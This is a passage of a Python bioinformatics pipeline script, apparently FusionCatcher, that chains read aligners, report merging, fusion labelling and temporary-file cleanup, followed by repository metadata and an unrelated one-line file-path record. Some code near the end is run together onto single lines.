                    job.add('',bd+'.amb',kind='input',command_line='no',temp_path=temp_flag)
                    job.add('',bd+'.ann',kind='input',command_line='no',temp_path=temp_flag)
                    job.add('',bd+'.bwt',kind='input',command_line='no',temp_path=temp_flag)
                    job.add('',bd+'.pac',kind='input',command_line='no',temp_path=temp_flag)
                    job.add('',bd+'.sa',kind='input',command_line='no',temp_path=temp_flag)
                    job.add('',fqm,kind='input')
                    job.add('>',outdir('focus-bwa.sam.'+str(i)),kind='output')
                    #job.add('2>',outdir('log_bwa_reads-gene-gene.stdout.txt.')+str(i),kind='output',checksum='no')
                    job.run()
                    job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag)
                    job.link(outdir('focus-bwa.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag)
                    sys.exit(1)
                if use_libssw:
                    ##########
                    # LIBSSW
                    #########
                    _LS_ = ''
                    # align the merged reads using libssw's ssw_test on candidate fusion gene-gene
                    job.add(_LS_+'ssw_test',kind='program')
                    job.add('-c',kind='parameter')
                    job.add('-r',kind='parameter')
                    job.add('-s',kind='parameter')
                    job.add('',outdir('genegene.fa.'+str(i)),kind='input')
                    job.add('',fqm,kind='input')
                    job.add('>',outdir('focus-libssw.sam.'+str(i)),kind='output')
                    job.run()
                    job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag)
                    job.link(outdir('focus-libssw.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag)
                if use_bbmap:
                    ##########
                    # BBMAP
                    #########
                    bd = outdir("focus_bbmap.%d/" % (i,))
                    # build the BBMAP index
                    job.add(_BP_+'bbmap.sh',kind='program')
                    job.add('ref=',outdir('genegene.fa.'+str(i)),kind='input',space='no',temp_path=temp_flag)
                    job.add('path=',bd,kind='output',space='no')
                    job.add('samplerate=','1',kind='parameter',space='no')
                    job.add('threads=',options.processes,kind='parameter',space='no',checksum='no')
                    #job.add('k=','11',kind='parameter',space='no') # default is 13 # if this is specified somehow the mapping goes wrong
                    job.add('-Xmx24g',kind='parameter',checksum='no')
                    job.run()
                    # align the unmapped reads using BBMAP on candidate fusion gene-gene
                    job.add(_BP_+'bbmap.sh',kind='program')
                    job.add('path=',bd,kind='input',space='no',temp_path=temp_flag)
                    job.add('sam=','1.3',kind='parameter',space='no')
                    job.add('slow=','t',kind='parameter',space='no')
                    job.add('threads=',options.processes,kind='parameter',space='no',checksum='no')
                    job.add('ignorebadquality=','f',kind='parameter',space='no')
                    #job.add('notags=','t',kind='parameter',space='no')
                    job.add('intronlen=','2',kind='parameter',space='no')
                    job.add('maxindel=',outdir('genegene_longest.txt.'+str(i)),kind='parameter',space='no',from_file = 'yes')
                    job.add('in=',fqm,kind='input',space='no',temp_path=temp_flag)
                    # job.add('in=',vel+'transcripts.fa',kind='input',space='no') # this is for oases
                    #job.add('in=',vel+'contigs.fa',kind='input',space='no') # this is for velvet
                    job.add('out=',outdir('focus-bbmap.sam.'+str(i)),kind='output',space='no')
                    job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no')
                    job.run()
                    job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag)
                    job.link(outdir('focus-bbmap.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag)
                if use_star:
                    ##########
                    # STAR
                    #########
                    # STAR is removing the /1 and /2 from the end of the reads names
                    # changing "/1" and "/2" into "-1" "-2" such that STAR does not remove them
                    job.add('LC_ALL=C',kind='program')
                    job.add('sed',kind='parameter')
                    job.add("""'s/\/\([1-2]$\)/\-\\1/;n;n;n'""",fqm,kind='input',temp_path=temp_flag)
                    job.add('>',fqm+'.fix',kind='output')
                    job.run()
                    # get the length of the FASTA file
                    # job.add('du',kind='program')
                    # job.add('-b',outdir('genegene.fa.'+str(i)),kind='input')
                    # job.add('|',kind='parameter')
                    # job.add('LC_ALL=C',kind='parameter')
                    # job.add('cut',kind='parameter')
                    # job.add('-f','1',kind='parameter')
                    # job.add('>',outdir('genegene.fa.len.'+str(i)),kind='output')
                    # job.run()
                    job.add('LC_ALL=C',kind='program')
                    job.add('grep',kind='parameter')
                    job.add('-v','"^>"',kind='parameter')
                    job.add('',outdir('genegene.fa.'+str(i)),kind='input')
                    job.add('|',kind='parameter')
                    job.add('wc',kind='parameter')
                    job.add('|',kind='parameter')
                    job.add('awk',kind='parameter')
                    job.add("'{print $3-$1}'",kind='parameter')
                    job.add('>',outdir('genegene.fa.len.'+str(i)),kind='output')
                    job.run()
                    f_sequences_gg = 2
                    f_nucleotides_gg = 100
                    if os.path.exists(outdir('genegene.fa.len.'+str(i))):
                        f_nucleotides_gg = int(float(file(outdir('genegene.fa.len.'+str(i)),'r').readline().strip()))
                    f_genomesaindexnbases = int(min(14, math.log(f_nucleotides_gg,2)/(float(2)) - 1))
                    f_genomechrbinnbits = int(min(18, math.log(float(f_nucleotides_gg)/float(f_sequences_gg),2)))
                    job.clean(outdir('genegene.fa.len.'+str(i)),temp_path=temp_flag)
                    perct = 0.60 # 0.49
                    bd = outdir("focus_star.%d/" % (i,))
                    bdr = outdir("focus_star_results.%d/" % (i,))
                    job.add(_SR_+'STAR',kind='program')
                    job.add('--genomeChrBinNbits',f_genomechrbinnbits,kind='parameter')
                    job.add('--genomeSAindexNbases',f_genomesaindexnbases,kind='parameter')
                    job.add('--runMode','genomeGenerate',kind='parameter')
                    if star25:
                        job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x
                    job.add('--runThreadN',options.processes,kind='parameter',checksum='no')
                    job.add('--genomeDir',bd,kind='output')
                    job.add('--genomeFastaFiles',outdir('genegene.fa.'+str(i)),kind='input',temp_path=temp_flag)
                    job.add('--outFileNamePrefix',bd,kind='output')
                    job.run()
                    z = outdir('genegene_longest.txt.'+str(i))
                    # t = "[from file: '%s']" % (z,)
                    # #if job.run():
                    # if os.path.exists(z):
                    #     t = file(z,'r').readline().strip()
                    # align the unmapped reads using STAR on candidate fusion gene-gene
                    job.add(_SR_+'STAR',kind='program')
                    job.add('--runRNGseed','54321',kind='parameter')
                    job.add('--twopass1readsN','-1',kind='parameter')
                    job.add('--twopassMode','Basic',kind='parameter')
                    job.add('--genomeSAindexNbases',f_genomesaindexnbases,kind='parameter')
                    job.add('--sjdbOverhang',min_len_reads*2-4,kind='parameter')
                    job.add('--alignIntronMin','5',kind='parameter') #???
                    job.add('--alignIntronMax',outdir('genegene_longest.txt.'+str(i)),kind='parameter',from_file = 'yes')
                    job.add('--outFilterMatchNmin',min_len_reads*2-4,kind='parameter')
                    job.add('--outFilterMatchNminOverLread',perct,kind='parameter')
                    job.add('--outFilterScoreMinOverLread',perct,kind='parameter') # NEW in v0.99.4b
                    job.add('--alignSplicedMateMapLminOverLmate',perct,kind='parameter') # NEW in v0.99.4b
                    job.add('--genomeDir',bd,kind='input',temp_path=temp_flag)
                    job.add('--runThreadN',options.processes,kind='parameter',checksum='no')
                    job.add('--seedSearchStartLmax',"12",kind='parameter') # 20 # default is: 50
                    job.add('--alignSJoverhangMin',"12",kind='parameter') # 9 # default is 5? # NEW in v0.99.4b
                    job.add('--alignSJstitchMismatchNmax','30 -1 30 30',kind='parameter') # default is: 0 -1 0 0 # added in STAR 2.5.x
                    job.add('--outSJfilterOverhangMin','10 10 10 10',kind='parameter') # default is: 30 12 12 12 ("non-canonical motifs","GT/AG"motif,"GC/AG"motif,"AT/AC"motif)
                    job.add('--outSJfilterCountUniqueMin','1 1 1 1',kind='parameter') # default is: 3 1 1 1
                    job.add('--outSJfilterCountTotalMin','1 1 1 1',kind='parameter') # default is: 3 1 1 1
                    job.add('--outSJfilterDistToOtherSJmin','0 0 0 0',kind='parameter') # default is: 10 0 5 10
                    job.add('--outSJfilterIntronMaxVsReadN',z,kind='parameter',from_file='yes') # default is: 50000 100000 200000
                    job.add('',z,kind='parameter',from_file='yes') # default is: 50000 100000 200000
                    job.add('',z,kind='parameter',from_file='yes') # default is: 50000 100000 200000
                    #job.add('--outSJfilterIntronMaxVsReadN','%s %s %s' % (t,t,t),kind='parameter') # default is: 50000 100000 200000
                    job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter')
                    job.add('--outSAMmultNmax','1',kind='parameter') # only one alignment per read
                    job.add('--scoreGapNoncan','-4',kind='parameter') # should it be -2?
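                    # gap penalties for non-canonical and AT/AC junctions are
                    # relaxed to -4 (STAR's defaults are stricter): fusion
                    # breakpoints need not fall on GT/AG splice motifs, so such
                    # gaps must remain score-competitive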
                    job.add('--scoreGapATAC','-4',kind='parameter')
                    # job.add('--scoreGap','0',kind='parameter')
                    # job.add('--scoreDelOpen','0',kind='parameter')
                    # job.add('--scoreDelBase','0',kind='parameter')
                    # job.add('--scoreInsOpen','0',kind='parameter')
                    # job.add('--scoreInsBase','0',kind='parameter')
                    job.add('--readFilesIn',fqm+'.fix',kind='input',temp_path=temp_flag)
                    job.add('--outFileNamePrefix',bdr,kind='output')
                    job.add('--outFileNamePrefix',os.path.join(bdr,'Aligned.out.sam'),kind='output',command_line = 'no')
                    job.run()
                    job.add('LC_ALL=C',kind='program')
                    job.add('sed',kind='parameter')
                    job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",os.path.join(bdr,'Aligned.out.sam'),kind='input',temp_path=temp_flag)
                    job.add(">",os.path.join(bdr,'Aligned.out.fix.sam'),kind='output')
                    job.run()
                    job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag)
                    job.link(os.path.join(bdr,'Aligned.out.fix.sam'),outdir('focus.sam.'+str(i)),temp_path=temp_flag)
                    job.clean(bdr,temp_path=temp_flag)
                if use_bowtie2:
                    ##########
                    # BOWTIE2
                    #########
                    bd = outdir("focus_bowtie2.%d/" % (i,))
                    bdi = outdir("focus_bowtie2.%d/index" % (i,))
                    # build the BOWTIE2 index
                    job.add(_B2_+'bowtie2-build',kind='program')
                    job.add('-f',kind='parameter')
                    job.add('--threads',options.processes,kind='parameter')
                    job.add('--quiet',kind='parameter')
                    job.add('--offrate','1',kind='parameter')
                    job.add('--ftabchars','7',kind='parameter')
                    job.add('',outdir('genegene.fa.'+str(i)),kind='input')
                    job.add('',bdi,kind='output',checksum='no')
                    job.add('',bd,kind='output',command_line='no')
                    job.run()
                    # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene
                    job.add(_B2_+'bowtie2',kind='program')
                    job.add('-p',options.processes,kind='parameter',checksum='no')
                    job.add('--phred33',kind='parameter')
                    job.add('--no-unal',kind='parameter')
                    job.add('--end-to-end',kind='parameter')
                    job.add('-N','0',kind='parameter') # new
                    job.add('-R','3',kind='parameter') # new
                    job.add('-D','20',kind='parameter') # new
                    job.add('-L','20',kind='parameter')
                    job.add('-i','S,1,0.50',kind='parameter')
                    job.add('-k','5',kind='parameter')
                    job.add('-x',bdi,kind='input',checksum='no')
                    job.add('-x',bd,kind='input',command_line='no',temp_path=temp_flag)
                    job.add('-U',fqm,kind='input')
                    job.add('-S',outdir('focus-bowtie2.sam.'+str(i)),kind='output')
                    job.add('2>',outdir('log_focus_bowtie2.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
                    job.run()
                    # -D 20 -R 3 -N 1 -L 20 => almost like bwa-mem
                    # tried -D 20 -R 3 -N 0 -L 20 -i 'S,1,0.5' but it was slow
                    job.clean(outdir('genegene_longest.txt.'+str(i)),temp_path=temp_flag)
                    job.link(outdir('focus-bowtie2.sam.'+str(i)),outdir('focus.sam.'+str(i)),temp_path=temp_flag)
                job.add(_FC_+'sam2psl.py',kind='program')
                job.add('--input',outdir('focus.sam.'+str(i)),kind='input',temp_path=temp_flag)
                job.add('--read-seq',kind='parameter')
                job.add('--output','-',kind='parameter')
                job.add('|',kind='parameter')
                job.add('LC_ALL=C',kind='parameter')
                job.add('sort',kind='parameter')
                job.add('-k','10,10',kind='parameter')
                job.add('-k','14,14',kind='parameter')
                # job.add('-k','12,12n',kind='parameter')
                # job.add('-k','13,13n',kind='parameter')
                job.add('-t',"'\t'",kind='parameter')
                if sort_buffer:
                    job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
                if sort_parallel:
                    job.add('--parallel',options.processes,kind='parameter',checksum='no')
                if sort_lzop_compress:
                    job.add('--compress-program','lzop',kind='parameter',checksum='no')
                elif sort_gzip_compress:
                    job.add('--compress-program','gzip',kind='parameter',checksum='no')
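                # the sort above orders the PSL records by column 10 (read name)
                # and column 14 (candidate junction name), the grouping expected
                # by the downstream PSL consumers; '-T' keeps sort's spill files
                # in the pipeline's own tmp_dir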
                job.add('-T',tmp_dir,kind='parameter',checksum='no')
                job.add('>',outdir('focus.psl.'+str(i)),kind='output',dest_list='genegenespotlight')
                job.run()
            else:
                job.clean(fqm,temp_path=temp_flag)
                job.clean(fgenes[i],temp_path=temp_flag)
        if hasattr(job, "genegenespotlight"):
            job.sink(job.genegenespotlight, outdir('gene-gene-spotlight_final.psl.txt'))
        else:
            job.add('touch',kind='program')
            job.add('',outdir('gene-gene-spotlight_final.psl.txt'),kind='output')
            job.run()
        job.add(_FC_+'concatenate.py',kind='program')
        job.add('-f',outdir('gene-gene-spotlight_final.psl.txt'),kind='input',temp_path=temp_flag)
        job.add('',outdir('gene-gene-spotlight_final.psl'),kind='output')
        job.run()
        if hasattr(job, "genegenespotlight"):
            job.clean(job.genegenespotlight,temp_path=temp_flag)
        #spanning_reads_spotlight = 2
        mismatches_spotlight = 40
        length_anchor2_spotlight = 150
        #length_anchor_spotlight = 40
        job.add(_FC_+'find_fusion_genes_psl2.py',kind='program')
        job.add('--input_mappings',outdir('gene-gene-spotlight_final.psl'),kind='input',temp_path=temp_flag)
        job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input')
        job.add('--input_genes_positions',datadir('genes.txt'),kind='input')
        job.add('--threshold_overlap',length_anchor_spotlight-1,kind='parameter')
        job.add('--mismatches',mismatches_spotlight,kind='parameter')
        job.add('--output',outdir('candidates_fusion_genes_reads_spotlight.txt'),kind='output')
        job.run()
        # summarize the gene-gene mappings
        job.add(_FC_+'build_report_fusions_psl2.py',kind='program')
        job.add('--suporting_unique_reads',spanning_reads_spotlight,kind='parameter')
        job.add('--trim-complex',length_anchor_spotlight,kind='parameter')
        job.add('--anchor2',length_anchor2_spotlight,kind='parameter')
        job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input')
        job.add('--input_fastq',outdir('focus.fq'),kind='input',temp_path=temp_flag)
        job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_spotlight.txt'),kind='input',temp_path=temp_flag)
        job.add('--input_unmapped_reads',outdir('reads_ids_unmapped.txt'),kind='input')
        job.add('--mismatches-gap',mismatches_spotlight,kind='parameter')
        job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no')
        if options.psl_visualization and not empty(datadir('genome.2bit')):
            job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input')
            job.add('--psl_alignment_type','web',kind='parameter')
            if _BT_:
                job.add('--blat-dir',_BT_,kind='parameter')
        if options.sam_visualization:
            job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input')
            job.add('--sam_alignment','20',kind='parameter')
            job.add('--threads',options.processes,kind='parameter')
            if _B2_:
                job.add('--bowtie2-dir',_B2_,kind='parameter')
        if options.assembly:
            job.add('--velvet',kind='parameter')
            if _VT_:
                job.add('--velvet-dir',_VT_,kind='parameter')
        job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_SPOTLIGHT.txt'),kind='output')
        job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_SPOTLIGHT.zip'),kind='output')
        job.run()

#
# merge all reports
#
job.add(_FC_+'merge_reports.py',kind='program')
job.add('--input_ambiguous',outdir('all_ambiguous_genes.txt'),kind='input',temp_path=temp_flag)
job.add('--input_bowtie',outdir('candidate_fusion_genes_summary_BOWTIE.txt'),kind='input',temp_path=temp_flag)
job.add('--input_candidate_fusion_genes',outdir('candidate_fusion-genes_further.txt'),kind='input',temp_path=temp_flag)
job.add('--anchor2',length_anchor2,kind='parameter')
if (not options.skip_blat) and (not empty(outdir('candidate_fusion_genes_summary_BLAT.txt'))):
    job.add('--supporting_pairs_blat',spanning_pairs_blat,kind='parameter')
    job.add('--supporting_reads_blat',spanning_reads_blat,kind='parameter')
    job.add('--input_blat',outdir('candidate_fusion_genes_summary_BLAT.txt'),kind='input',temp_path=temp_flag)
if (not options.skip_star) and (not empty(outdir('candidate_fusion_genes_summary_STAR.txt'))):
    job.add('--supporting_pairs_star',spanning_pairs_star,kind='parameter')
    job.add('--supporting_reads_star',spanning_reads_star,kind='parameter')
    job.add('--input_star',outdir('candidate_fusion_genes_summary_STAR.txt'),kind='input',temp_path=temp_flag)
if (not options.skip_bowtie2) and (not empty(outdir('candidate_fusion_genes_summary_BOWTIE2.txt'))):
    job.add('--supporting_pairs_bowtie2',spanning_pairs_bowtie2,kind='parameter')
    job.add('--supporting_reads_bowtie2',spanning_reads_bowtie2,kind='parameter')
    job.add('--input_bowtie2',outdir('candidate_fusion_genes_summary_BOWTIE2.txt'),kind='input',temp_path=temp_flag)
if (not options.skip_spotlight) and (not empty(outdir('candidate_fusion_genes_summary_SPOTLIGHT.txt'))):
    job.add('--supporting_pairs_spotlight',spanning_pairs_spotlight,kind='parameter')
    job.add('--supporting_reads_spotlight',spanning_reads_spotlight,kind='parameter')
    job.add('--input_spotlight',outdir('candidate_fusion_genes_summary_SPOTLIGHT.txt'),kind='input',temp_path=temp_flag)
# if (not options.skip_bwa) and (not empty(outdir('candidate_fusion_genes_summary_BWA.txt'))):
#     job.add('--supporting_pairs_bwa',spanning_pairs_bwa,kind='parameter')
#     job.add('--supporting_reads_bwa',spanning_reads_bwa,kind='parameter')
#     job.add('--input_bwa',outdir('candidate_fusion_genes_summary_BWA.txt'),kind='input',temp_path=temp_flag)
if not options.long_report:
    job.add('--squish-report',kind='parameter')
job.add('--output',outdir('final-list_candidate-fusion-genes-temp.txt'),kind='output')
job.run()
# label known readthrough fusions
job.add(_FC_+'label_found_fusions.py',kind='program')
job.add('--data',datadir('readthroughs.txt'),kind='input')
job.add('--input',outdir('final-list_candidate-fusion-genes-temp.txt'),kind='input',temp_path=temp_flag)
job.add('--output',outdir('final-list_candidate-fusion-genes-t2.txt'),kind='output')
job.add('--data-not-commutative',kind='parameter')
job.add('--label','readthrough',kind='parameter')
job.run()
# label exon-exon borders
job.add(_FC_+'label_exonexon.py',kind='program')
job.add('--gtf',datadir('organism.gtf'),kind='input')
job.add('--input',outdir('final-list_candidate-fusion-genes-t2.txt'),kind='input',temp_path=temp_flag)
job.add('--output',outdir('final-list_candidate-fusion-genes-t3.txt'),kind='output')
job.run()
# label read-through circular RNAs
job.add(_FC_+'label_rtcircrna.py',kind='program')
job.add('--input',outdir('final-list_candidate-fusion-genes-t3.txt'),kind='input',temp_path=temp_flag)
job.add('--output',outdir('final-list_candidate-fusion-genes-t4.txt'),kind='output')
job.run()
# inspect fusion sequences
job.add(_FC_+'inspect_fusion_sequences.py',kind='program')
job.add('--input',outdir('final-list_candidate-fusion-genes-t4.txt'),kind='input',temp_path=temp_flag)
job.add('--output',outdir('final-list_candidate-fusion-genes-t5.txt'),kind='output')
job.add('--threshold','2.0',kind='parameter')
job.add('--threshold2','1.5',kind='parameter')
job.add('--remove-poly',info_file,kind='output')
job.run()
# inspect fusion sequences for banned sequences
job.add(_FC_+'filter_fusion_sequences.py',kind='program')
job.add('--input',outdir('final-list_candidate-fusion-genes-t5.txt'),kind='input',temp_path=temp_flag) job.add('--banned',datadir('banned_seq.fa'),kind='input') job.add('--output',outdir('final-list_candidate-fusion-genes-t6.txt'),kind='output') job.add('--removed',outdir('final-list_candidate-fusion-genes-t6_removed.txt'),kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nCandidate fusions removed due to banned fusion sequences: %s\n--------------------------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('cat',kind='program') job.add('',outdir('final-list_candidate-fusion-genes-t6_removed.txt'),kind='input',temp_path=temp_flag) job.add('>>',info_file,kind='output') job.run() # predict effect of fusion job.add(_FC_+'predict_frame.py',kind='program') job.add('--gtf',datadir('organism.gtf'),kind='input') job.add('--transcripts',datadir('transcripts.fa'),kind='input') job.add('--input',outdir('final-list_candidate-fusion-genes-t6.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('final-list_candidate-fusion-genes_sequences.txt'),kind='output') #fusion_transcripts_sequences: if options.compress_transcripts: job.add('--compress-transcripts',kind='parameter') job.run() job.add('zip',kind='program') job.add('-j',kind='parameter') job.add('',outdir('final-list_candidate-fusion-genes_sequences.txt.zip'),kind='output') job.add('',outdir('final-list_candidate-fusion-genes_sequences.txt'),kind='input') job.run() job.add('cut',kind='program') job.add('-f','1-16',kind='parameter') job.add('',outdir('final-list_candidate-fusion-genes_sequences.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('final-list_candidate-fusion-genes_.txt'),kind='output') job.run() job.add(_FC_+'filter-wiggle.py',kind='program') job.add('-i',outdir('final-list_candidate-fusion-genes_.txt'),kind='input',temp_path=temp_flag) job.add('-o',outdir('final-list_candidate-fusion-genes.txt'),kind='output') job.run() job.add(_FC_+'fc2vcf.py',kind='program') job.add('-i',outdir('final-list_candidate-fusion-genes.txt'),kind='input') job.add('-n',outdir('info.txt'),kind='input') job.add('-o',outdir('final-list_candidate-fusion-genes.vcf'),kind='output') job.run() if not options.skip_conversion_grch37: human = [line for line in file(datadir('version.txt'),'r').readlines() if line.lower().find('homo sapiens')!=-1 or line.lower().find('grch38')!=-1] #print "Human Genome GRCh38 found!" 
if human and len(human) == 2: # lift over the fusion coordinates from GRCh38 to GRCh37/hg19 job.add(_FC_+'liftover.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes.txt'),kind='input') job.add('--chain',datadir('hg38ToHg19.over.chain.gz'),kind='input') job.add('--output',outdir('final-list_candidate-fusion-genes.hg19.txt'),kind='output') if _LR_: job.add('--path-liftover',_LR_,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() # build a short summary of the candidate fusions job.add(_FC_+'build_summary.py',kind='program') job.add('--input',outdir('final-list_candidate-fusion-genes.txt'),kind='input') job.add('--viruses',outdir('viruses_bacteria_phages.txt'),kind='input') job.add('--output',outdir('summary_candidate_fusions.txt'),kind='output') job.run() job.link(datadir('final-list_candidate-fusion-genes.caption.md.txt'), outdir('final-list_candidate-fusion-genes.caption.md.txt'), temp_path = 'no', kind = 'copy') job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'(NR==1) || (($3>%d) && ($7=="skipped"))'""" % (spanning_pairs_minimum-1,),outdir('preliminary-list_candidate-fusion-genes.txt'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"4,5",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add("'\\t'","'/'",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('>',outdir('junk-chimeras.txt'),kind='output') job.run() # save the preliminary candidates to info file info(job, fromfile = outdir('preliminary-list_candidate-fusion-genes.txt'), tofile = info_file, top = ["\n\n\n===========================================", "Preliminary list of candidate fusion genes:", "==========================================="], bottom = "\n\n\n", temp_path = temp_flag if not options.keep_preliminary else 'no') # # CLEANING # if hasattr(job,'gg2seq'): job.clean(job.gg2seq,temp_path=temp_flag) if hasattr(job,'gg2nuc'): job.clean(job.gg2nuc,temp_path=temp_flag) to_delete_list_files = [ outdir('gene-gene_split_blat.fa'), outdir('gene-gene_split_blat.len'), outdir('gene-gene_split_bowtie2.fa'), outdir('gene-gene_split_bowtie2.len'), outdir('gene-gene_split_star.len'), outdir('gene-gene_split_star.fa'), outdir('gene-gene_split_bwa.fa'), outdir('gene-gene_split_bwa.len') ] job.clean(to_delete_list_files,list_file = "yes",temp_path=temp_flag) to_delete = [ outdir('reads_mapped-exon-exon-fusion-genes_sorted-ref.map'), outdir('candidate_fusion-genes_further.txt'), outdir('candidate_fusion-genes_supporting_paired-reads.txt'), outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'), outdir('pre-fusion'), outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'), outdir('candidate_focus_genes.txt'), outdir('candidate_focus_reads.txt'), outdir('gene-gene-bowtie_star_unique.fa'), outdir('gene-gene-bowtie_bowtie2_unique.fa'), outdir('exon-exon_junction_cut_split.fa'), outdir('eporcrlf2.txt'), outdir('all_ambiguous_genes.txt'), outdir('candidate_fusion-genes_exon-exon.txt'), outdir('candidate_fusion-genes_further.txt'), outdir('candidate_fusion-genes_missing_mates.txt'), outdir('count_reads_left_after_filtering.txt'), outdir('gene-gene.2bit'), outdir('gene-gene.fa'), outdir('gene-gene-star/'), outdir('gene-gene-bowtie2/'), outdir('gene-gene-star-results/'), outdir('gene-gene_longest.txt'), outdir('gene-gene_unique.fa'), outdir('original.fq'), 
outdir('focus.fq'), outdir('original.fq.gz'), outdir('originala.fq'), outdir('originala.fq.gz'), outdir('original_important.fq.gz'), outdir('original_important.txt'), outdir('reads_filtered_mapped-transcriptome.fq'), outdir('reads-filtered_multiple-mappings-genome.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-p.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_ex-ex_final_big.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fu.fq'), outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_end.map'), outdir('reads_filtered_transcriptome_sorted-read_end_important.map'), outdir('candidate_fusion-genes_further_eporcrlf2igh.txt'), outdir('split_gene-gene_star_unmapped_final.psl'), outdir('list_candidates_ambiguous_homologous_genes.txt'), outdir('candidate_fusion-genes_no-offending-reads.txt'), outdir('reads_ids_unmapped.txt'), outdir('reads_gene-gene.fq'), outdir('exon-exon_junction_cut__seq.txt'), outdir('exon-exon_junction_cut__nuc.txt'), outdir('gene-gene_unique__nuc.txt'), outdir('gene-gene__nuc.txt'), outdir('gene-gene__seq.txt'), outdir('gene-gene2__nuc.txt'), outdir('gene-gene2__seq.txt'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'), outdir('candidate_fusion-genes_fragments.txt'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'), outdir('gene-gene_unique__seq.txt'), outdir('log_lengths_original_reads.txt'), outdir('log_lengths_original_reads_plus.txt'), outdir('log_lengths_original_reads_final.txt'), outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_map.stdout.txt'), outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_multiple_map.stdout.txt'), outdir('log_bowtie_reads-filtered-out.stdout.txt'), outdir('log_bowtie_reads_mapped-exon-exon-fusion-genes_map.stdout.txt'), outdir('log_bowtie_reads_mapped-genome.stdout.txt'), outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'), outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-genome-blat_last.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-genome_last.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-genome.stdout.txt'), outdir('log_bowtie_reads-unmapped-filtered-out-transcriptome.stdout.txt'), outdir('log_lengths_reads.txt'), outdir('log_minimum_length_short_read.txt'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'), outdir('log_number_of_reads_processed.txt'), outdir('log_overlaps_error.txt'), outdir('log_lengths_reads_gene-gene_no-str.txt'), outdir('log_counts_reads_gene-gene_no-str.txt'), outdir('candidate_fusion-genes_further_paired-reads.txt'), outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_final2.txt'), outdir('log_removed_single_reads1.txt'), outdir('candidate_fusion-genes_further_mark.txt'), outdir('star_sdjboverhang.txt'), outdir('split_gene-gene_star_final.psl'), outdir('split_gene-gene_bowtie2_final.psl'), outdir('split_gene-gene_bwa_final.psl'), outdir('single/'), outdir('restart.sh')] 
job.clean(to_delete,temp_path=temp_flag) if urls: job.unprotect(urls) job.clean(new_input_output,temp_path = temp_flag) job.clean(tmp_dir,temp_path='yes') job.close() # #The End! #
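# ---------------------------------------------------------------------------
# Editor's note (illustrative, not part of the original pipeline code):
# a typical invocation of this script; option names follow the FusionCatcher
# manual and should be treated as assumptions for your installed version.
#
#   fusioncatcher.py -d /data/fusioncatcher/current \
#                    -i sample_R1.fastq.gz,sample_R2.fastq.gz \
#                    -o results/
#
# The ranked candidates produced by the reporting steps above are written to
# final-list_candidate-fusion-genes.txt (plus a .vcf conversion) inside the
# chosen output directory.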
ndaniel/fusioncatcher
bin/fusioncatcher.py
Python
gpl-3.0
801,064
[ "BWA", "Biopython", "Bowtie" ]
14fa4cc51324b66c4d847e53fe92024b011e5c1230eda33bea09a6cbbc931048
../../../../../../../share/pyshared/orca/scripts/toolkits/Gecko/script.py
Alberto-Beralix/Beralix
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/scripts/toolkits/Gecko/script.py
Python
gpl-3.0
73
[ "ORCA" ]
56637d5b6e63b71a6c44d99e51896d00eac50df6f6053ffb4fee30f323436763
